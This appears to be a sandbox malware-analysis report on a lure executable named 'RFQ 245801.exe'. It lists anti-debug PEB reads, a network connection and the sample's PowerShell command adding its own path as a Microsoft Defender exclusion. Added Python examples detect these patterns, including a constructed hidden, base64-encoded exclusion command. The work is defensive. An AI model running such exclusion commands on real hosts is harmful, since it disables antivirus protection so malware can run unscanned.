          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017180A0 mov eax, dword ptr fs:[00000030h]5_2_017180A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B80A8 mov eax, dword ptr fs:[00000030h]5_2_017B80A8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172208A mov eax, dword ptr fs:[00000030h]5_2_0172208A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C437C mov eax, dword ptr fs:[00000030h]5_2_017C437C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]5_2_017A035C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AC912 mov eax, dword ptr fs:[00000030h]5_2_017AC912
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01718918 mov eax, dword ptr fs:[00000030h]5_2_01718918
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01718918 mov eax, dword ptr fs:[00000030h]5_2_01718918
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E908 mov eax, dword ptr fs:[00000030h]5_2_0179E908
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E908 mov eax, dword ptr fs:[00000030h]5_2_0179E908
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017529F9 mov eax, dword ptr fs:[00000030h]5_2_017529F9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017529F9 mov eax, dword ptr fs:[00000030h]5_2_017529F9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AE9E0 mov eax, dword ptr fs:[00000030h]5_2_017AE9E0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017549D0 mov eax, dword ptr fs:[00000030h]5_2_017549D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EA9D3 mov eax, dword ptr fs:[00000030h]5_2_017EA9D3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B69C0 mov eax, dword ptr fs:[00000030h]5_2_017B69C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A89B3 mov esi, dword ptr fs:[00000030h]5_2_017A89B3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A89B3 mov eax, dword ptr fs:[00000030h]5_2_017A89B3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A89B3 mov eax, dword ptr fs:[00000030h]5_2_017A89B3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017209AD mov eax, dword ptr fs:[00000030h]5_2_017209AD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017209AD mov eax, dword ptr fs:[00000030h]5_2_017209AD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AE872 mov eax, dword ptr fs:[00000030h]5_2_017AE872
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AE872 mov eax, dword ptr fs:[00000030h]5_2_017AE872
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6870 mov eax, dword ptr fs:[00000030h]5_2_017B6870
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6870 mov eax, dword ptr fs:[00000030h]5_2_017B6870
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01750854 mov eax, dword ptr fs:[00000030h]5_2_01750854
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01724859 mov eax, dword ptr fs:[00000030h]5_2_01724859
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01724859 mov eax, dword ptr fs:[00000030h]5_2_01724859
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01732840 mov ecx, dword ptr fs:[00000030h]5_2_01732840
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov ecx, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A830 mov eax, dword ptr fs:[00000030h]5_2_0175A830
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C483A mov eax, dword ptr fs:[00000030h]5_2_017C483A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C483A mov eax, dword ptr fs:[00000030h]5_2_017C483A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AC810 mov eax, dword ptr fs:[00000030h]5_2_017AC810
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175C8F9 mov eax, dword ptr fs:[00000030h]5_2_0175C8F9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175C8F9 mov eax, dword ptr fs:[00000030h]5_2_0175C8F9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EA8E4 mov eax, dword ptr fs:[00000030h]5_2_017EA8E4
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E8C0 mov eax, dword ptr fs:[00000030h]5_2_0174E8C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F08C0 mov eax, dword ptr fs:[00000030h]5_2_017F08C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AC89D mov eax, dword ptr fs:[00000030h]5_2_017AC89D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720887 mov eax, dword ptr fs:[00000030h]5_2_01720887
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171CB7E mov eax, dword ptr fs:[00000030h]5_2_0171CB7E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01718B50 mov eax, dword ptr fs:[00000030h]5_2_01718B50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h]5_2_017F2B57
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h]5_2_017F2B57
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h]5_2_017F2B57
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h]5_2_017F2B57
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CEB50 mov eax, dword ptr fs:[00000030h]5_2_017CEB50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D4B4B mov eax, dword ptr fs:[00000030h]5_2_017D4B4B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D4B4B mov eax, dword ptr fs:[00000030h]5_2_017D4B4B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6B40 mov eax, dword ptr fs:[00000030h]5_2_017B6B40
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6B40 mov eax, dword ptr fs:[00000030h]5_2_017B6B40
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EAB40 mov eax, dword ptr fs:[00000030h]5_2_017EAB40
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C8B42 mov eax, dword ptr fs:[00000030h]5_2_017C8B42
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174EB20 mov eax, dword ptr fs:[00000030h]5_2_0174EB20
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174EB20 mov eax, dword ptr fs:[00000030h]5_2_0174EB20
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E8B28 mov eax, dword ptr fs:[00000030h]5_2_017E8B28
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E8B28 mov eax, dword ptr fs:[00000030h]5_2_017E8B28
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4B00 mov eax, dword ptr fs:[00000030h]5_2_017F4B00
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]5_2_01728BF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]5_2_01728BF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]5_2_01728BF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174EBFC mov eax, dword ptr fs:[00000030h]5_2_0174EBFC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017ACBF0 mov eax, dword ptr fs:[00000030h]5_2_017ACBF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CEBD0 mov eax, dword ptr fs:[00000030h]5_2_017CEBD0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]5_2_01740BCB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]5_2_01740BCB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]5_2_01740BCB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]5_2_01720BCD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]5_2_01720BCD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]5_2_01720BCD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h]5_2_01730BBE
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h]5_2_01730BBE
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h]5_2_017D4BB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h]5_2_017D4BB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h]5_2_0179CA72
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h]5_2_0179CA72
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]5_2_0175CA6F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]5_2_0175CA6F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]5_2_0175CA6F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CEA60 mov eax, dword ptr fs:[00000030h]5_2_017CEA60
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h]5_2_01730A5B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h]5_2_01730A5B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h]5_2_01744A35
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h]5_2_01744A35
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175CA24 mov eax, dword ptr fs:[00000030h]5_2_0175CA24
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174EA2E mov eax, dword ptr fs:[00000030h]5_2_0174EA2E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017ACA11 mov eax, dword ptr fs:[00000030h]5_2_017ACA11
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h]5_2_0175AAEE
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h]5_2_0175AAEE
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720AD0 mov eax, dword ptr fs:[00000030h]5_2_01720AD0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h]5_2_01754AD0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h]5_2_01754AD0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]5_2_01776ACC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]5_2_01776ACC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]5_2_01776ACC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h]5_2_01728AA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h]5_2_01728AA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01776AA4 mov eax, dword ptr fs:[00000030h]5_2_01776AA4
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01758A90 mov edx, dword ptr fs:[00000030h]5_2_01758A90
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
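Every entry above is a read of the Process Environment Block: on 32-bit Windows the thread's TEB sits at fs:[0] and fs:[0x30] holds the PEB pointer, which is where both debugger checks (PEB.BeingDebugged at +0x02, PEB.NtGlobalFlag at +0x68) and hand-rolled API resolution through PEB.Ldr (+0x0C) start. The Python below is an added triage example, not code from the sample or from Joe Sandbox: it scans raw code bytes for the two encodings of that instruction and names the PEB field the next instruction reads. Function names are the example's own and the byte string is hand-assembled for the demonstration, not bytes dumped from the sample.

```python
"""Locate x86 reads of the PEB through fs:[0x30] in raw code bytes and name the
PEB field the following instruction reads.

Added triage example for the 'mov <reg>, dword ptr fs:[00000030h]' hits listed
above; not code from the sample or from Joe Sandbox. SAMPLE at the bottom is
hand-assembled for the demonstration, not bytes dumped from the sample.
"""
from typing import List, Optional, Tuple

# Register order used by the x86 ModRM reg/rm fields.
_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 32-bit _PEB fields that anti-debug and API-resolution code reads first.
_PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}

_DISP_PEB = b"\x30\x00\x00\x00"


def find_peb_loads(code: bytes) -> List[Tuple[int, str, int]]:
    """Return (offset, destination register, length) for each PEB load.

    Two encodings cover every hit in the report:
      64 A1 30 00 00 00      mov eax, fs:[0x30]   (moffs32 form, 6 bytes)
      64 8B /r 30 00 00 00   mov r32, fs:[0x30]   (ModRM mod=00 rm=101 + disp32,
                                                   7 bytes; ModRM = 0x05 | reg << 3)
    """
    found = []
    i, n = 0, len(code)
    while i < n:
        if code[i] == 0x64 and code[i + 1:i + 2] == b"\xA1" and code[i + 2:i + 6] == _DISP_PEB:
            found.append((i, "eax", 6))
            i += 6
        elif (code[i] == 0x64 and code[i + 1:i + 2] == b"\x8B"
              and i + 7 <= n and (code[i + 2] & 0xC7) == 0x05
              and code[i + 3:i + 7] == _DISP_PEB):
            found.append((i, _REGS[(code[i + 2] >> 3) & 7], 7))
            i += 7
        else:
            i += 1
    return found


def peb_field_read_next(code: bytes, offset: int, reg: str, length: int) -> Optional[str]:
    """Name the PEB field if the instruction right after the load reads [reg+disp8].

    Decodes the idioms that follow a PEB load in practice:
      8A /r    mov r8,  [reg+disp8]         e.g. mov al, [eax+2]
      8B /r    mov r32, [reg+disp8]         e.g. mov eax, [eax+0x68]
      0F B6/B7 movzx r32, [reg+disp8]       e.g. movzx eax, byte ptr [eax+2]
      80 /7    cmp byte [reg+disp8], imm8   e.g. cmp byte ptr [eax+2], 0
    An esp base needs a SIB byte and is left undecoded.
    """
    rm = _REGS.index(reg)
    if rm == 4:
        return None
    nxt = code[offset + length:]

    def is_disp8_modrm(b: int, opcode_ext: Optional[int] = None) -> bool:
        # mod=01 (8-bit displacement) with rm = our base register; optionally pin /digit.
        return (b & 0xC7) == (0x40 | rm) and (
            opcode_ext is None or ((b >> 3) & 7) == opcode_ext)

    disp = None
    if len(nxt) >= 3 and nxt[0] in (0x8A, 0x8B) and is_disp8_modrm(nxt[1]):
        disp = nxt[2]
    elif len(nxt) >= 4 and nxt[0] == 0x0F and nxt[1] in (0xB6, 0xB7) and is_disp8_modrm(nxt[2]):
        disp = nxt[3]
    elif len(nxt) >= 4 and nxt[0] == 0x80 and is_disp8_modrm(nxt[1], opcode_ext=7):
        disp = nxt[2]
    if disp is None:
        return None
    return _PEB_FIELDS.get(disp, f"PEB+0x{disp:02X}")


def scan(code: bytes) -> List[Tuple[int, str, Optional[str]]]:
    """(offset, register, PEB field or None) for every PEB load in the blob."""
    return [(off, reg, peb_field_read_next(code, off, reg, ln))
            for off, reg, ln in find_peb_loads(code)]


# Hand-assembled sample for this example, not bytes from the analysed file.
SAMPLE = (
    b"\x55\x8B\xEC"                  # push ebp; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"      # mov eax, fs:[0x30]
    b"\x0F\xB6\x40\x02"              # movzx eax, byte ptr [eax+2]   -> PEB.BeingDebugged
    b"\x85\xC0"                      # test eax, eax
    b"\x64\x8B\x1D\x30\x00\x00\x00"  # mov ebx, fs:[0x30]
    b"\x8B\x43\x68"                  # mov eax, [ebx+0x68]           -> PEB.NtGlobalFlag
    b"\x90\x90"                      # nop; nop
    b"\x64\x8B\x0D\x30\x00\x00\x00"  # mov ecx, fs:[0x30]
    b"\x8B\x41\x0C"                  # mov eax, [ecx+0x0C]           -> PEB.Ldr (module walk)
    b"\x64\x8B\x35\x30\x00\x00\x00"  # mov esi, fs:[0x30]
    b"\xC3"                          # ret: no follow-up read to classify
)

if __name__ == "__main__":
    for off, reg, field in scan(SAMPLE):
        print(f"+0x{off:04X}  mov {reg}, fs:[0x30]  ->  {field or 'use not decoded'}")
```

A load followed by a BeingDebugged or NtGlobalFlag read is an anti-debug check; a load followed by a Ldr read normally opens an export walk of ntdll, the usual prelude to the indirect NtQueueApcThread and NtClose calls listed under the evasion section below. Run over a dumped unpacked region of the sample (the 5_2_017xxxxx functions above), the per-function counts in the report would fall out of `find_peb_loads` directly.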
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 7_2_00642167 GetProcessHeap,htons,htons,InternalGetTcpTableWithOwnerModule,htons,htons,InternalGetTcpTable2,htons,htons,HeapFree,InternalGetBoundTcpEndpointTable,htons,htons,HeapFree,htons,htons,InternalGetTcp6TableWithOwnerModule,htons,htons,InternalGetTcp6Table2,htons,htons,HeapFree,InternalGetBoundTcp6EndpointTable,htons,htons,HeapFree,InternalGetUdpTableWithOwnerModule,htons,HeapFree,InternalGetUdp6TableWithOwnerModule,htons,HeapFree
Source: C:\Users\user\Desktop\RFQ 245801.exe; Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 7_2_00645DC0 SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 7_2_00645C30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\RFQ 245801.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe; Network Connect: 188.114.96.3 80
Source: C:\Users\user\Desktop\RFQ 245801.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe" (2 occurrences)
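The PowerShell launch above is the Defender-exclusion step: once the sample's own path is excluded, later unpacking stages are never scanned. The same cmdlet is frequently passed base64-encoded through -EncodedCommand, so a command-line rule has to decode before it matches. The Python below is an added detection example, not code from the sample, from Joe Sandbox or from any detection project: it decodes any -EncodedCommand spelling (UTF-16LE base64), then reports exclusion-adding cmdlets with the excluded value. The function names are the example's own; the command lines it runs on are constructed, apart from the first, which is the one quoted in the line above.

```python
"""Flag process-creation command lines that add Microsoft Defender exclusions,
including the base64 -EncodedCommand form.

Added detection example for the Add-MpPreference -ExclusionPath launch above;
not code from the sample, from Joe Sandbox or from any detection project.
The command lines at the bottom are constructed, except the first, which is
the one quoted in this report.
"""
import base64
import re
from typing import List, Optional

_CMDLET = re.compile(r"\b(add|set)-mppreference\b", re.IGNORECASE)
# Value may be double-quoted, single-quoted or bare.
_EXCLUSION = re.compile(
    r"-exclusion(path|process|extension|ipaddress)\s+(\"[^\"]*\"|'[^']*'|[^\s;]+)",
    re.IGNORECASE,
)
_PARAM_NAMES = {"path": "ExclusionPath", "process": "ExclusionProcess",
                "extension": "ExclusionExtension", "ipaddress": "ExclusionIpAddress"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (any unambiguous prefix: -e, -ec,
    -enc, ...), or None when the line is not encoded or does not decode cleanly."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith("-"):
            continue
        name = tok[1:].lower()
        if name and (name == "ec" or "encodedcommand".startswith(name)):
            try:
                raw = base64.b64decode(tokens[i + 1].strip('"'), validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def defender_exclusion_findings(cmdline: str) -> List[dict]:
    """One finding per exclusion-adding cmdlet statement, after decoding if needed."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    findings = []
    for stmt in re.split(r"[;\r\n]", text):
        cm = _CMDLET.search(stmt)
        if not cm:
            continue
        for pm in _EXCLUSION.finditer(stmt):
            findings.append({
                "cmdlet": cm.group(1).capitalize() + "-MpPreference",
                "parameter": _PARAM_NAMES[pm.group(1).lower()],
                "value": pm.group(2).strip("\"'"),
                "encoded": decoded is not None,
            })
    return findings


# Constructed process-creation command lines. REPORTED is quoted from this report;
# the encoded one is built here so the base64 is correct by construction.
REPORTED = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
            r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"')
INNER_SCRIPT = r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
ENCODED = ("powershell.exe -NoP -W Hidden -enc "
           + base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii"))
BENIGN = "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"

if __name__ == "__main__":
    for line in (REPORTED, ENCODED, BENIGN):
        print(defender_exclusion_findings(line) or "no finding", "<-", line[:60])
```

On a live host the matching audit is the ExclusionPath, ExclusionProcess and ExclusionExtension properties returned by Get-MpPreference, and Defender's operational log event 5007 (configuration changed), which records each exclusion at the moment it is added; a user-writable path such as the one excluded here should never appear in either.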
